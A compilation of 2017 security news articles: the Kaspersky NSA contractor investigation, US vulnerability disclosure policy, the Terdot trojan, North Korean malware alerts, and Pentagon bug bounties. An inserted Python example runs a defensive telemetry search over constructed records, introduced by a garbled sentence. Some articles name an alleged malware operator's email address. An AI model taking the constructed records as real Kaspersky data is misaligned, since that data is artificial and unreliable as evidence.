Kaspersky denied any direct involvement and provided further details about the hack, but it was not a good period for the firm.

In September, the US Government banned the Russian security firm from all federal government systems.

The PC was hacked after the NSA employee installed a backdoored key generator for a pirated copy of Microsoft Office.

In October, Kaspersky Lab published a detailed report on the case that explains how cyber spies could have easily stolen the software exploits from the NSA employee’s Windows PC.

In October many media outlets accused Kaspersky of helping Russian intelligence detect the US cyber weapons on the PC via its security solutions, but according to the security firm the situation is quite different.

According to the telemetry logs collected by the Russian firm, the staffer temporarily switched off the antivirus protection on the PC and infected his personal computer with spyware bundled with a product key generator while trying to use a pirated copy of Office.

On September 11, 2014, the Kaspersky antivirus detected the Win32.GrayFish.gen trojan on the NSA employee’s PC; some time later the employee disabled the Kaspersky software to execute the activation-key generator.

When the antivirus was reactivated on October 4, it removed the backdoored key-gen tool from the NSA employee’s PC and uploaded it to Kaspersky’s cloud for further analysis.

Kaspersky offered to hand over the source code of its solution to US experts to prove it wasn’t involved in any cyber espionage operation.

Back to the present: Kaspersky has published a new report that sheds light on the investigation the firm conducted into the NSA-linked Equation Group APT.

Kaspersky ran searches in its databases starting from June 2014, six months prior to 2015, the year of the alleged hack of its antivirus, for all alerts triggered by wildcard verdicts such as “HEUR:Trojan.Win32.Equestre.*”. The experts found a few test signatures in place that produced a large number of false positives.

The analysis revealed one specific signature that fired a large number of times in a short time span on just one system, namely “HEUR:Trojan.Win32.Equestre.m”, on a 7zip archive (referred to below as “[undisclosed].7z”). This was the starting point of the analysis of that system, which was found to contain not only this archive but many other files, both common and unknown, indicating that the user was probably involved in the malware’s development.
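The retrospective telemetry search described above (wildcard match on the verdict name, spotting noisy test signatures, and singling out one host with a burst of hits) as an added example; this is not code from Kaspersky’s report, and the records, host names and paths are constructed for illustration.

```python
import fnmatch
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed telemetry records (not real Kaspersky data), one per line:
# "<ISO timestamp> <host id> <verdict> <detected object>"
SAMPLE_ALERTS = """\
2014-06-20T08:00:00 host-B HEUR:Trojan.Win32.Equestre.t C:\\Windows\\Temp\\vendor_update.dll
2014-07-01T09:15:00 host-C HEUR:Trojan.Win32.Equestre.t C:\\Program Files\\vendor\\tool.exe
2014-07-03T14:40:00 host-D HEUR:Trojan.Win32.Equestre.t D:\\backup\\tool.exe
2014-08-15T16:05:00 host-E HEUR:Trojan.Win32.Equestre.t C:\\Users\\x\\old\\tool.exe
2014-09-11T10:02:11 host-A HEUR:Trojan.Win32.Equestre.m C:\\Users\\u\\Desktop\\[undisclosed].7z
2014-09-11T10:02:13 host-A HEUR:Trojan.Win32.Equestre.m C:\\Users\\u\\Desktop\\[undisclosed].7z
2014-09-11T10:02:20 host-A HEUR:Trojan.Win32.Equestre.m C:\\Users\\u\\Desktop\\[undisclosed].7z
2014-09-11T10:03:05 host-A HEUR:Trojan.Win32.Equestre.m C:\\Users\\u\\src\\loader.exe
2014-09-11T10:03:40 host-A HEUR:Trojan.Win32.Equestre.m C:\\Users\\u\\src\\driver.sys
2014-09-11T10:04:02 host-A HEUR:Trojan.Win32.Equestre.m C:\\Users\\u\\Desktop\\[undisclosed].7z
2014-10-04T12:00:00 host-A Backdoor.Win32.Mokes.hvl C:\\Users\\u\\Downloads\\kms.exe
"""

# Search window start used by the report: six months before the alleged incident year.
SEARCH_START = datetime(2014, 6, 1)


def parse_alerts(text):
    """Parse the records; the detected object is the remainder of the line (may contain spaces)."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, verdict, obj = line.split(" ", 3)
        alerts.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "verdict": verdict, "object": obj})
    return alerts


def search_verdicts(alerts, pattern, since=SEARCH_START):
    """Alerts on or after `since` whose verdict matches a shell-style wildcard (case-sensitive)."""
    return [a for a in alerts
            if a["ts"] >= since and fnmatch.fnmatchcase(a["verdict"], pattern)]


def likely_false_positive_signatures(alerts, min_hosts=3):
    """Signatures spread thinly over many hosts (one hit per host) look like noisy test signatures."""
    hosts_per_sig = defaultdict(set)
    hits_per_sig = defaultdict(int)
    for a in alerts:
        hosts_per_sig[a["verdict"]].add(a["host"])
        hits_per_sig[a["verdict"]] += 1
    return sorted(sig for sig, hosts in hosts_per_sig.items()
                  if len(hosts) >= min_hosts and hits_per_sig[sig] == len(hosts))


def burst_hosts(alerts, window=timedelta(minutes=5), min_hits=5):
    """(host, verdict) pairs with at least `min_hits` detections inside a sliding time window."""
    by_key = defaultdict(list)
    for a in alerts:
        by_key[(a["host"], a["verdict"])].append(a["ts"])
    bursts = {}
    for key, stamps in by_key.items():
        stamps.sort()
        left, best = 0, 0
        for right in range(len(stamps)):
            while stamps[right] - stamps[left] > window:
                left += 1
            best = max(best, right - left + 1)
        if best >= min_hits:
            bursts[key] = best
    return bursts


def objects_for(alerts, host):
    """Unique detected objects on one host: the starting point for a per-system review."""
    return sorted({a["object"] for a in alerts if a["host"] == host})


if __name__ == "__main__":
    hits = search_verdicts(parse_alerts(SAMPLE_ALERTS), "HEUR:Trojan.Win32.Equestre.*")
    print("noisy signatures:", likely_false_positive_signatures(hits))
    for (host, verdict), n in burst_hosts(hits).items():
        print(f"{host}: {n} hits of {verdict} in 5 minutes ->", objects_for(hits, host))
```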

“In total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users’ privacy.” states the new report published by Kaspersky.

“This was a hard decision, but should we make an exception once, even for the sake of protecting our own company’s reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.”


The analysis of the computer where the archive was found revealed that it was already infected with malware. In October of that year the user downloaded a pirated copy of Microsoft Office 2013, but the .ISO contained the Mokes backdoor.

“What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as “kms.exe” (a name of a popular pirated software activation tool), and “kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions”. Kaspersky Lab products detected the malware with the verdict Backdoor.Win32.Mokes.hvl.” continues Kaspersky.

Kaspersky was able to detect and halt Mokes, but the user turned off the Kaspersky software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two-month period its security software found 128 separate malware samples on the machine that weren’t related to the Equation Group.

Kaspersky found that the Mokes’ command and control servers were apparently being operated by a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com.”

Kaspersky explained that it’s also possible that the NSA contractor’s PC may have been infected with a sophisticated strain of malware developed by an APT that was not detected at the time.

“Given that system owner’s potential clearance level, the user could have been a prime target of nation states,” Kaspersky said. “Adding the user’s apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands.”

Further details are included in the technical report.


White House Cyber Chief Provides Transparency Into Zero-Day Disclosure Process
16.11.2017 securityweek BigBrothers
Government Vulnerability Disclosure Process (VEP)

The U.S. government Wednesday introduced greater transparency into its Vulnerabilities Equities Policy (VEP) program. This is the process by which government agencies decide whether to disclose or stockpile the cyber vulnerabilities they discover.

In a lengthy statement, White House Cybersecurity Coordinator Rob Joyce explained why not all discoveries are disclosed. That will not change; but in introducing greater transparency into the process of decision-making, he hopes "to demonstrate to the American people that the Federal Government is carefully weighing the risks and benefits as we carry out this important mission."

The extent to which the government agencies use cyber vulnerabilities to further their own overseas missions became known with Edward Snowden's leaked documents. This sparked greater discussion over the morality of government collection and use of vulnerabilities without disclosing the existence of those vulnerabilities to the product vendors concerned.

Microsoft, for example, developed detailed proposals for introducing international norms of cyber behavior that would rely on no government keeping private supplies (hoarding) of undisclosed 0-day vulnerabilities; and also called for a digital Geneva Convention that would "mandate that governments report vulnerabilities to vendors rather than stockpile, sell or exploit them." This is unlikely to happen. "Our national capacity to find and hold criminals and other rogue actors accountable relies on cyber capabilities enabled by exploiting vulnerabilities in the digital infrastructure they use. Those exploits produce intelligence for attribution, evidence of crimes, enable defensive investigations, and posture us to respond to our adversaries with cyber capabilities," said Joyce in his statement.

The theft and release of 'Equation Group' (generally considered to be the NSA) tools and exploits by the Shadow Brokers (generally considered to be 'Russia') brought new emphasis to the issue. These tools included the EternalBlue exploit soon used by hackers (quite probably nation-state affiliated hackers) in the worldwide WannaCry and NotPetya ransomware outbreaks.

Joyce formerly served as head of the NSA’s Tailored Access Operations (TAO) unit—an offensive hacking team tasked with breaking into systems of foreign entities.

The unproven implication is that if the NSA had disclosed their vulnerabilities, the worldwide disruption caused by WannaCry and NotPetya might not have happened. There is, however, little mention of the danger of theft inherent in any store of vulnerabilities in this week's VEP transparency announcement, beyond two considerations in the decision process: "If USG knowledge of this vulnerability were to be revealed, what risks could that pose for USG relationships with industry?", and "If USG knowledge of this vulnerability were to be revealed, what risks could that pose for USG international relations?"

The full unclassified VEP process document (PDF) "describes the Vulnerabilities Equities Policy and Process for departments and agencies of the United States Government (USG) to balance equities and make determinations regarding disclosure or restriction when the USG obtains knowledge of newly discovered and not publicly known vulnerabilities in information systems and technologies."

In short, it explains the process without altering the policy. Its purpose is to introduce transparency and reassure the public that the government will weigh the offensive advantages obtained against the threat of public disruption if used by third-parties, for each 0-day vulnerability it discovers.

That transparency is valuable, but there remain numerous concerns. One is that the VEP continues to be an administrative exercise not enshrined in law. It can be changed at any time without public or legislative overview.

In May 2017, Senators Brian Schatz (D-Hawaii), Ron Johnson (R-Wis.), and Cory Gardner (R-Colo.) and U.S. Representatives Ted Lieu (D-Calif.) and Blake Farenthold (R-Texas) introduced the 'Protecting Our Ability to Counter Hacking Act of 2017' -- the PATCH Act.

Its purpose is to promote the transparency introduced this week, but make it a legal requirement rather than an administrative choice. The Patch Act appears to have stalled, with no real progress since its introduction in May.

Other concerns appear in the Exceptions section of the VEP process document. For example, "The United States Government's decision to disclose or restrict vulnerability information could be subject to restrictions by partner agreements and sensitive operations." This will exclude 0-days discovered by, say, GCHQ and disclosed to the NSA under an effective non-disclosure agreement; and it could also exclude 0-days expected to be used in potential operations (such as Stuxnet).

It has long been suspected that members of the Five Eyes surveillance alliance share intelligence on each other's nationals to circumvent individual laws forbidding surveillance of their own subjects. If this happens in practice, a similar arrangement between each member's intelligence agencies would exclude shared vulnerabilities from the VEP process. Both exclusions will undoubtedly be used by the more offense-driven agencies (the NSA and the CIA) to both hold and keep secret their most 'valuable' exploits.

Nevertheless, the purpose of declassifying the VEP process is primarily to reassure the American people that the secretive intelligence agencies do not have free rein in the vulnerabilities they keep and the vulnerabilities they use -- and to that extent it will probably succeed.


Kaspersky Shares More Details on NSA Incident
16.11.2017 securityweek  BigBrothers
Kaspersky Lab on Thursday shared more details from its investigation into reports claiming that Russian hackers stole data belonging to the U.S. National Security Agency (NSA) by exploiting the company’s software.

The Wall Street Journal reported last month that hackers working for the Russian government stole information on how the U.S. penetrates foreign networks and how it defends against cyberattacks. The files were allegedly taken in 2015 from the personal computer of an NSA contractor who had been using a security product from Kaspersky Lab.

The WSJ article suggested that Kaspersky either knowingly helped the Russian government obtain the files or that the hackers exploited vulnerabilities in the company’s software without the firm’s involvement.

In a preliminary report, Kaspersky said the incident referenced in the WSJ article likely took place in 2014, when the company was investigating malware used by the Equation Group, a threat actor later associated with the NSA.

In a more technical report published on Thursday, Kaspersky said the incident likely occurred between September 11, 2014 and November 17, 2014 – the security firm believes WSJ’s source may have mixed up the dates.

In September 2014, Kaspersky’s products detected malware associated with the Equation Group on a device with an IP address pointing to the Baltimore area in Maryland. It’s worth noting that the NSA headquarters are in Fort Meade, Maryland, less than 20 miles from the city of Baltimore.

The Kaspersky product present on the device automatically sent an archive containing the suspected malware files back to the company’s systems for further analysis. The archive contained source code for Equation malware, along with four documents with classification markings (e.g. secret, confidential).

The Kaspersky analyst who found the archive informed the company’s CEO of its content and the decision was made to remove the files from its storage systems.

So is it possible that the classified files were somehow obtained by Russian actors from Kaspersky’s systems? The firm denies spying for the Russian government and claims the data was removed from its systems – only some statistics and metadata remain – but it cannot guarantee that its employees handled the data appropriately.

“We cannot assess whether the data was ‘handled appropriately’ (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so,” the company said.

While Kaspersky admitted that its systems were breached in 2015 by a threat group linked to Israeli intelligence, the company said it found no evidence that the NSA files left its systems.

As for the assumption that Kaspersky’s products may have been specifically configured to look for secret files on the systems they were installed on, the company said all the signatures for retrieving files from a user’s device are carefully handled and verified by an experienced developer, and there is no evidence that anyone created a signature for files marked “secret” during the Equation investigation.

The company determined that an analyst did create a signature for files with names that included the string “secret,” but it was for a piece of malware associated with the TeamSpy espionage campaign. The signature included a path specific for that malware to avoid false positives.

Another possible scenario is related to the fact that the device of the NSA contractor got infected with malware after the Kaspersky antivirus was disabled. The security product was temporarily disabled when the user attempted to install a pirated copy of Microsoft Office using a known activation tool.

After the antivirus was re-enabled, Kaspersky detected 121 threats on the system. The malware associated with the Office activation tool was Smoke Bot (aka Smoke Loader), which had been sold on Russian underground forums since 2011. At the time of the incident, the malware communicated with servers apparently set up by an individual located in China.

Kaspersky says it’s also possible that the contractor’s computer may have been infected with stealthy malware from a sophisticated threat actor that was not detected at the time.

Several recent media reports focused on Kaspersky’s alleged connection to the Kremlin, which has led to many U.S. officials raising concerns regarding the use of company’s products. As a result, the Department of Homeland Security (DHS) has ordered all government agencies to identify and remove the firm’s products, despite the apparent lack of evidence supporting the claims.

In an effort to clear its name, Kaspersky announced the launch of a new transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.


Terdot Banking Trojan Could Act as Cyber-Espionage Tool
16.11.2017 securityweek BigBrothers
The Terdot banking Trojan packs information-stealing capabilities that could easily turn it into a cyber-espionage tool, Bitdefender says in a new report.

Highly customized and sophisticated, Terdot is based on the source code of ZeuS, which leaked online in 2011. The banking Trojan resurfaced in October last year and Bitdefender has been tracking its whereabouts ever since, the security company notes in a technical paper (PDF).

Terdot was designed to operate as a proxy to perform man-in-the-middle (MitM) attacks, as well as to steal browser information such as login credentials or the stored credit card data. Furthermore, the malware is capable of injecting HTML code into visited web pages.

The malware relies more on legitimate applications for its nefarious purposes, including certificate injection tools, than on in-house developed software.

Although designed as a banking Trojan, Terdot’s capabilities go well beyond its primary purpose, Bitdefender notes. The threat can eavesdrop and modify traffic on social media and email platforms, and also packs automatic update features that allow it to download and execute any file provided by the operator.

This malware family mainly focuses on targeting Canadian institutions from the banking sector, but the analyzed samples would also target email service providers such as Microsoft’s live.com, Yahoo Mail, and Gmail. It also targets social networks such as Facebook, Twitter, Google Plus, and YouTube. According to Bitdefender, the malware avoids gathering data related to vk.com, the largest social platform in Russia.

The main distribution channel for the Trojan is the Sundown exploit kit, but Terdot was also observed spreading via malicious emails containing a button masquerading behind a PDF icon. When clicked on, it would execute obfuscated JavaScript code to download and run the malware file.

A complex chain of droppers, injections, and downloaders is used to deliver Terdot and third-party utilities employed by the threat, in an attempt to trick defenses and hinder analysis.

After infection, the malware injects itself into the browser process by hooking very low-level network socket operations to direct connections to its own proxy and read traffic (which also allows it to alter traffic). Terdot can steal authentication data either by inspecting the client’s requests or by injecting spyware JavaScript code into the response.

The malware can also bypass secure connections by generating certificates for each of the domains the victim visits.

Terdot’s components are split across numerous processes, each with a specific role. Long-running Windows processes such as Windows Explorer, for example, are used either for injection purposes to spread the infection inside the machine or as watchdogs, to hinder disinfection. The malware uses the msiexec.exe process for running its MitM proxy.

In their technical analysis of the threat, Bitdefender’s security researchers explain that, after installation and initial handshake with the command and control server, the malware downloads updates and commands from the same URL it sends system information to (including a unique identifier, malware version, CRC32s of downloaded data, Windows version, processor architecture, system language, and network adapter IP).

The bot supports a wide range of commands: it can uninstall itself, run a specified file, execute a simple GET request, add or remove URLs to/from a list that signals the proxy to disable injections for them, and add or remove URLs to/from a blocking list. The malware also features a Domain Generation Algorithm (DGA).

“Terdot is a complex malware. Its modular structure, complex injections, and careful use of threads make it resilient, while its spyware and remote execution abilities make it extremely intrusive. Terdot goes above and beyond the capabilities of a banker Trojan. Its focus on harvesting credentials for other services such as social networks and email service providers could turn it into an extremely powerful cyber-espionage tool that is extremely difficult to spot and clean,” Bitdefender concludes.


UK Cyber Security Chief Blames Russia for Hacker Attacks
16.11.2017 securityweek BigBrothers
Russia has launched cyber attacks on the UK media, telecoms and energy sectors in the past year, Britain's cyber security chief said Wednesday amid reports of Russian interference in the Brexit referendum.

"Russia is seeking to undermine the international system. That much is clear," Ciaran Martin, head of Britain's National Cyber Security Centre (NCSC) said at a London tech conference, according to his office.

"Russian interference, seen by the NCSC over the past year, has included attacks on the UK media, telecommunications and energy sectors," Martin said.

The centre has coordinated the government's response to 590 significant incidents since its launch in 2016, although the government agency has not detailed which were linked to Russia.

Prime Minister Theresa May on Monday accused Moscow of "seeking to weaponise information" and "sow discord in the West and undermine our institutions".

Russia's cyber activities include "deploying its state-run media organisations to plant fake stories and photo-shopped images", she said in a speech.

The scathing criticism was rejected by Russia's foreign ministry, which accused May of trying to distract the British public from problems at home.

Moscow's alleged attempts to influence last year's referendum on Britain's membership of the European Union are part of investigations under way in London.

May told lawmakers on Wednesday that parliament's intelligence and security committee would be looking into Russian interference.

Meanwhile parliament's digital, culture, media and sport committee has requested data from Twitter and Facebook on Russia-linked accounts and aims to interview social media executives at the British embassy in Washington early next year.

- Pro-Brexit 'bots' -

Damian Collins, the committee chairman, said it was "beyond doubt" that Russia has interfered in UK politics.

He said there was a pattern of behaviour of Russian organisations seeking out opportunities to create division, unrest and instability in the West.

"Foreign organisations have the ability to manipulate social media platforms to target voters abroad," he told AFP.

"This is seriously-organised buildings of hundreds of people engaged in propagating every day fake news through social media."

He said it was "terrifying" how cheap and easy it was for them to reach millions of people.

"It is one of the biggest threats our democracies face and we have to be serious about combatting it," Collins added.

May's spokesman insisted: "There has been no evidence of successful interference in our electoral processes."

Researchers at the University of Edinburgh, who examined 2,752 accounts suspended by Twitter in the United States, found 419 were operating from the Russian Internet Research Agency and attempting to influence British politics, The Guardian reported.

Professor Laura Cram, the university's neuropolitics research director, told the newspaper they tweeted about Brexit 3,468 times -- mostly after the June 23 referendum.

The content overall was "quite chaotic and it seems to be aimed at wider disruption. There's not an absolutely clear thrust. We pick up a lot on refugees and immigration", she said.

Meanwhile researchers at Swansea University in Wales and the University of California, Berkeley, have found more than 150,000 Russian-based Twitter accounts which may have influenced the Brexit referendum.

The social media accounts switched their attention to EU membership in the run-up to the 2016 referendum, according to research outlined in The Times newspaper.

Many of the accounts were fully-automated "bot" profiles which posted hundreds of tweets daily, or "cyborg" accounts which were partially run by people, the newspaper said.

The majority of the posts were pro-Brexit, while some supported remaining in the European Union.

Meanwhile it was revealed that a tweet which caused a furore after the Westminster terror attack in March originally came from a trolling agency account which, according to evidence before the US Congress, is backed by the Russian government.

The tweet showed a picture of a woman in a headscarf walking next to a victim, with the words: "Muslim woman pays no mind to the terror attack, casually walks by a dying man while checking phone".


U.S. Government Shares Details of FALLCHILL Malware Used by North Korea
15.11.2017 securityweek  BigBrothers
FALLCHILL Malware Used by North Korean Government Hackers is a Fully Functional RAT, DHS Says

The United States Department of Homeland Security (DHS) shared details of a hacking tool they say is being used by a threat group linked to the North Korean government known as “Hidden Cobra.”

The threat actor dubbed by the U.S. government “Hidden Cobra” is better known in the cybersecurity community as Lazarus Group, which is believed to be behind several high-profile attacks, including the ones targeting Sony Pictures, Bangladesh’s central bank, and financial organizations in Poland. Links have also been found between the threat actor and the recent WannaCry ransomware attacks, but some experts are skeptical.


A joint alert issued by the DHS and FBI said a remote administration tool (RAT) known as FALLCHILL was used by the North Korean government to hack into companies in the aerospace, telecommunications, and finance sectors. The alert describes FALLCHILL as a “fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies.”

The U.S. Government has been able to identify 83 network nodes in the infrastructure used by the FALLCHILL malware. The alert says that, according to a trusted third party, FALLCHILL uses fake SSL headers for communications. "After collecting basic system information, the backdoor will begin communication with the C&C server using a custom encrypted protocol with the header that resembles TLS/SSL packets," it reads.

In a separate alert issued Tuesday, the DHS and FBI shared a list of Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a variant of the Volgmer Trojan used by the North Korean government. The alert describes Volgmer as a backdoor Trojan “designed to provide covert access to a compromised system.” The DHS says at least 94 static IP addresses were identified as connected to Volgmer's infrastructure, along with dynamic IP addresses registered across various countries.

According to DHS, the North Korea-linked hackers have been using Volgmer malware in attacks against the government, financial, automotive, and media industries since at least 2013.

“DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to North Korean government malicious cyber activity,” the alert states.

The DHS warned that spear phishing appears to be the primary delivery mechanism for Volgmer infections; but added that the Hidden Cobra threat actors also use a suite of custom tools, some of which could also be used to initially compromise a system.

The alert with technical details and IOCs on FALLCHILL is available here. The alert and technical details for the Volgmer Trojan are available here.

In June, US-CERT released a technical alert to warn organizations of distributed denial-of-service (DDoS) attacks conducted by Hidden Cobra.


US DHS and FBI share reports on FALLCHILL and Volgmer malware used by North Korean Hidden Cobra APT
15.11.2017 securityaffairs BigBrothers

US DHS published the details of the malware FALLCHILL and Volgmer used by the APT group Hidden Cobra that is linked to the North Korean government.
The US Department of Homeland Security (DHS) published the details of the hacking tool FALLCHILL used by one of the APT groups linked to the North Korean government, tracked as Hidden Cobra (aka Lazarus Group).

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Pictures hack.

In June, the United States Computer Emergency Readiness Team (US-CERT) issued a technical alert about the activity of North Korea’s ‘Hidden Cobra’ APT group.

Many experts believe the WannaCry ransomware was developed by the Lazarus Group due to similarities in the attack code. The UK Government also linked the WannaCry attack that crippled the NHS to North Korea.

The DHS and FBI issued a joint alert that reveals a remote administration tool (RAT) known as FALLCHILL was used by the North Korean hackers to target companies in the aerospace, finance, and telecommunications sectors.

“Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a remote administration tool (RAT) used by the North Korean government—commonly known as FALLCHILL.” states the report.

“According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies.”

The US experts identified 83 network nodes in the FALLCHILL infrastructure, including countries in which the infected IP addresses are registered.

The report includes a list of indicators of compromise (IOCs), Network Signatures associated with the threat and Yara rules for its detection.


The US DHS also published a separate report on another threat, the Volgmer Trojan used by the North Korean government. Volgmer is a backdoor Trojan “designed to provide covert access to a compromised system,” and it has been used since 2013.

“Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries.” states the report.

“It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer.”

This second report also includes details of the infrastructure associated with the malware and IoCs.

The DHS tracked at least 94 static IP addresses along with dynamic IP addresses registered across various countries, most of them in India (772 IPs – 25.4 percent), Iran (373 IPs – 12.3 percent), and Pakistan (343 IPs – 11.3 percent).

The Volgmer malware has been used by Pyongyang in attacks against the government, financial, automotive, and media industries since at least 2013. The threat was delivered via spear-phishing emails.

The DHS also warned that Hidden Cobra has a suite of custom tools that the North Korean hackers used to break into the targeted companies.


Freedom of the Net report – Manipulating Social Media, hacking election and much more
14.11.2017 securityweek BigBrothers

Freedom of the Net report – Online manipulation played a crucial role in elections in at least 18 countries over the past year, including the United States.
While cyber security experts still debate the cyber attacks on the 2016 Presidential Election, according to the independent watchdog Freedom House at least 18 countries had their elections targeted by online manipulation last year.

The group surveyed 65 nation states comprising 87 percent of internet users and observed that in at least 18 cases, foreign governments or outside bodies had tried to influence an election by restricting or interfering with internet use.

According to the organization, governments around the world are dramatically increasing their efforts to manipulate information on social media, threatening the notion of the internet as a liberating technology. This is the message that emerged from the annual Freedom of the Net report.

“The use of paid commentators and political bots to spread government propaganda was pioneered by China and Russia but has now gone global,” said Michael Abramowitz, president of Freedom House. “The effects of these rapidly spreading techniques on democracy and civic activism are potentially devastating.”

While in some cases the interference attempts came from foreign actors, in the majority of cases they were carried out either by the local government or by the opposition. The watchdog reported that 30 countries have now been found to be running armies of trolls to try to influence public sentiment on specific topics.

“Venezuela, the Philippines, and Turkey were among 30 countries where governments were found to employ armies of “opinion shapers” to spread government views, drive particular agendas, and counter government critics on social media.” states the report. “The number of governments attempting to control online discussions in this manner has risen each year since Freedom House began systematically tracking the phenomenon in 2009.”

The Chinese government is the most active in this sense: it uses a cyber army of bloggers and social media users who support its policies and discredit political opponents. Unfortunately, China isn’t the only one: in Russia, the Internet Research Agency is the “troll farm” reportedly financed by a businessman with close ties to President Vladimir Putin.

Unlike other methods of censorship, online content manipulation is very difficult to detect and combat, and countering it takes time and resources.

“Not only is this manipulation difficult to detect, it is more difficult to combat than other types of censorship, such as website blocking, because it’s dispersed and because of the sheer number of people and bots deployed to do it,” said Sanja Kelly, director of the Freedom on the Net project. “The fabrication of grassroots support for government policies on social media creates a closed loop in which the regime essentially endorses itself, leaving independent groups and ordinary citizens on the outside.”


Giving a look at other data in the report, Freedom House classified only 23 percent of the internet as “free.”


This year 14 countries passed laws restricting internet use, in some cases banning VPNs, and 19 countries used some kind of internet shutdown during political events.

The report also warns that physical attacks on netizens and online journalists are spreading globally: in 8 countries (including Brazil, Mexico, Pakistan, and Syria) journalists or online commentators have been killed for their online activities.

According to the Freedom of the Net report, things will get worse in the future.


Bug bounty programs and a vulnerability disclosure policy allowed the Pentagon to fix thousands of flaws
13.11.2017 securityaffairs BigBrothers

Bug bounty programs allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.
The ‘Hack the Pentagon’ bug bounty program launched by the Pentagon in 2016, along with the vulnerability disclosure policy announced nearly one year ago, allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.

“Great news for U.S. citizens! Over 3,000 valid security vulnerabilities have been resolved with the U.S. Department of Defense’s “Hack the Pentagon” hacker-powered security program.” reported the platform used by the US Government to manage the initiatives.

“Just over a year ago, following the success of the pilot, we announced the U.S. Department of Defense was expanding its “Hack the Pentagon,” initiatives. To date, HackerOne and DoD have run bug bounty challenges for Hack the Pentagon, Hack the Army and Hack the Air Force.”

The success of the bug bounty programs launched by the US Government has been undeniable.

The hackers earned over $300,000 in bounties for nearly 500 vulnerabilities found in the bounty challenges; through the disclosure program, researchers reported weaknesses in nearly 40 DoD components, more than 100 of which were rated critical or high severity.

Let me also remind you that the DoD vulnerability disclosure program does not offer any monetary rewards, instead it allows hackers to report security holes without the fear of potential legal consequences.

The list of vulnerabilities includes remote code execution, SQL injection, and authentication bypass issues.


The majority of the reports were submitted by US researchers, followed by white hat hackers in India, the U.K., Pakistan, Philippines, Egypt, Russia, France, Australia and Canada.

Looking at the individual bug bounty initiatives launched by the US Government: Hack the Pentagon received 138 valid submissions and paid out roughly $75,000, Hack the Army paid out approximately $100,000 for 118 valid reports, and Hack the Air Force paid out $130,000 for 207 valid reports.

Following the success of “Hack the Pentagon,” several bug bounty programs were announced by U.S. authorities.


Hackers Helped Pentagon Patch Thousands of Flaws
13.11.2017 securityweek BigBrothers
Bug bounty programs and a vulnerability disclosure policy have helped the U.S. Department of Defense patch thousands of security holes in its systems.

Nearly one year after it announced its vulnerability disclosure policy, the Pentagon received 2,837 valid bug reports from roughly 650 white hat hackers located in 50 countries around the world, according to HackerOne, the platform used by the organization to host its projects.

More than 100 of the flaws reported to the Pentagon through its vulnerability disclosure program have been rated critical or high severity. Weaknesses, found in nearly 40 DoD components, include remote code execution, SQL injection, and authentication bypass issues.

A majority of the reports were submitted by researchers from the United States, followed by India, the U.K., Pakistan, Philippines, Egypt, Russia, France, Australia and Canada.

The DoD vulnerability disclosure program does not offer any monetary rewards - it only provides a channel for reporting security holes without the fear of potential legal consequences.

However, the Pentagon’s cybersecurity initiatives also include several bug bounty programs that offered monetary rewards. Researchers who took part in these challenges earned more than $300,000 for almost 500 flaws discovered in the organization’s public-facing systems. On the other hand, the government estimated that it saved millions of dollars by running these bug bounty programs.

The first initiative was Hack the Pentagon, which received 138 valid submissions and paid out roughly $75,000. Next were Hack the Army which paid out approximately $100,000 for 118 valid reports, and Hack the Air Force, which earned participants $130,000 for 207 valid reports.

Following the success of “Hack the Pentagon,” several bug bounty programs and related initiatives were announced by U.S. government organizations and lawmakers.

The General Services Administration (GSA) has launched a bug bounty program that offers rewards ranging between $300 and $5,000, and the Internal Revenue Service (IRS) announced a $2 million contract with security testing firm Synack for help in securing its online presence.

The Department of Justice (DoJ) has created a framework designed to help organizations develop formal vulnerability disclosure programs.

As for legislation, the Internet of Things (IoT) Cybersecurity Improvement Act of 2017 will require companies that provide Internet-connected devices to the government to have a vulnerability disclosure policy. Senators also announced the Hack Department of Homeland Security (DHS) Act, which aims to establish a bug bounty pilot program within the DHS.


DHS – Tests demonstrate Boeing 757 airplanes vulnerable to hacking
13.11.2017 securityaffairs BigBrothers

Researchers and private industry experts, along with DHS officials, remotely hacked a Boeing 757 airplane that was parked at the airport in Atlantic City.
